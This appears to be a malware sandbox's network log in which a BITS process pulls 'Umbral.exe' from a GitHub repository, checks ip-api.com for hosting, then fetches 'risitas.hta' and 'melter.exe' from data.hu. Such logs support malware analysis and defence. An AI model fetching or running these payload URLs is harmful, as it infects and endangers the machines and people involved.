*.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A0C21:656450:66B5F497
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=18494-34811
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A0CAF:6564EF:66B5F499
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=34812-75005
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A0D56:65659A:66B5F49A
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=75006-162434
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A0DC0:656624:66B5F49B
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=162435-235007
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A0E88:6566F7:66B5F49D
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.109.133
-
HEADhttps://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeRemote address:185.199.111.133:443RequestHEAD /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
date: Fri, 09 Aug 2024 10:50:58 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1723200658.466123,VS0,VE131
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: fa8deeeae9405a61332bbdf805556605da60ae9b
expires: Fri, 09 Aug 2024 10:55:58 GMT
source-age: 0
content-length: 235008
-
GEThttps://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeRemote address:185.199.111.133:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=0-1119
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 0-1119/235008
date: Fri, 09 Aug 2024 10:50:58 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200659.679473,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: e16bc1d3df62624a57e67ef717d0085da8a6aec6
expires: Fri, 09 Aug 2024 10:55:58 GMT
source-age: 0
content-length: 1120
-
GEThttps://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeRemote address:185.199.111.133:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=1120-3325
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 1120-3325/235008
date: Fri, 09 Aug 2024 10:51:01 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200662.525629,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: c32cf7ee898682b9ba40febf90e365f43b2913cd
expires: Fri, 09 Aug 2024 10:56:01 GMT
source-age: 3
content-length: 2206
-
GEThttps://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeRemote address:185.199.111.133:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=3326-7624
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 3326-7624/235008
date: Fri, 09 Aug 2024 10:51:03 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200664.761020,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: f916357d50515538dbe35f456a65273cf8041640
expires: Fri, 09 Aug 2024 10:56:03 GMT
source-age: 5
content-length: 4299
-
GEThttps://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeRemote address:185.199.111.133:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=7625-18493
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 7625-18493/235008
date: Fri, 09 Aug 2024 10:51:05 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200666.837599,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 60933f38e3ef2c9bc9a41aea58099cc491219361
expires: Fri, 09 Aug 2024 10:56:05 GMT
source-age: 7
content-length: 10869
-
GEThttps://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeRemote address:185.199.111.133:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=18494-34811
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 18494-34811/235008
date: Fri, 09 Aug 2024 10:51:06 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200667.908691,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: bb0f0c39820d6f3db40e3152530434dc645c2600
expires: Fri, 09 Aug 2024 10:56:06 GMT
source-age: 8
content-length: 16318
-
GEThttps://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeRemote address:185.199.111.133:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=34812-75005
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 34812-75005/235008
date: Fri, 09 Aug 2024 10:51:07 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200668.997773,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 454225dbcc8de102730e0cac5a345e13b706ddbb
expires: Fri, 09 Aug 2024 10:56:07 GMT
source-age: 9
content-length: 40194
-
GEThttps://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeRemote address:185.199.111.133:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=75006-162434
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 75006-162434/235008
date: Fri, 09 Aug 2024 10:51:09 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200669.056551,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 06965168cba95e3277f055f5029258babdfa3af5
expires: Fri, 09 Aug 2024 10:56:09 GMT
source-age: 10
content-length: 87429
-
GEThttps://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeRemote address:185.199.111.133:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=162435-235007
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 162435-235007/235008
date: Fri, 09 Aug 2024 10:51:10 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200670.129366,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: f8b497915177d7c159dcfd192c9d6d71ce56961b
expires: Fri, 09 Aug 2024 10:56:10 GMT
source-age: 12
content-length: 72573
-
Remote address:8.8.8.8:53Request215.156.26.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request133.111.199.185.in-addr.arpaIN PTRResponse133.111.199.185.in-addr.arpaIN PTRcdn-185-199-111-133githubcom
-
Remote address:8.8.8.8:53Requestgstatic.comIN AResponsegstatic.comIN A172.217.23.195
-
Remote address:172.217.23.195:443RequestGET /generate_204 HTTP/1.1
Host: gstatic.com
Connection: Keep-Alive
ResponseHTTP/1.1 204 No Content
Cross-Origin-Resource-Policy: cross-origin
Date: Fri, 09 Aug 2024 10:51:10 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Request195.23.217.172.in-addr.arpaIN PTRResponse195.23.217.172.in-addr.arpaIN PTRams16s37-in-f31e100net195.23.217.172.in-addr.arpaIN PTRprg03s05-in-f3�H195.23.217.172.in-addr.arpaIN PTRprg03s05-in-f195�H
-
Remote address:8.8.8.8:53Requestimage.noelshack.comIN AResponseimage.noelshack.comIN A35.227.215.6
-
Remote address:35.227.215.6:443RequestGET /fichiers/2021/14/5/1617997407-risitas.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: image.noelshack.com
ResponseHTTP/1.1 404 Not Found
x-request-id: 4WMdrYc20w2IdsbHoW5eS
x-cloud-trace-context: 2c7a0b963c1d2970f29e866e05d9f5c4
date: Fri, 09 Aug 2024 10:51:11 GMT
server: Google Frontend
Content-Length: 27
via: 1.1 google
X-cdn-cache-status: miss
X-cdn-cache-id: LHR-1bd33b0f
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Requestddl8.data.huIN AResponseddl8.data.huIN CNAMEstore8.data.hustore8.data.huIN A217.65.97.73store8.data.huIN A217.65.97.74store8.data.huIN A217.65.97.75
-
Remote address:217.65.97.73:443RequestGET /get/387805/13078039/risitas.hta HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ddl8.data.hu
ResponseHTTP/1.1 200 OK
Date: Fri, 09 Aug 2024 10:51:11 GMT
Content-Type: application/octet-stream
Content-Length: 511
Last-Modified: Wed, 13 Jul 2022 17:17:58 GMT
Connection: keep-alive
Content-Disposition: attachment; filename=risitas.hta
ETag: "62cefe46-1ff"
Accept-Ranges: bytes
-
Remote address:217.65.97.73:443RequestGET /get/339969/12880996/melter.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ddl8.data.hu
ResponseHTTP/1.1 200 OK
Date: Fri, 09 Aug 2024 10:51:12 GMT
Content-Type: application/octet-stream
Content-Length: 3072
Last-Modified: Fri, 09 Apr 2021 19:31:07 GMT
Connection: keep-alive
Content-Disposition: attachment; filename=melter.exe
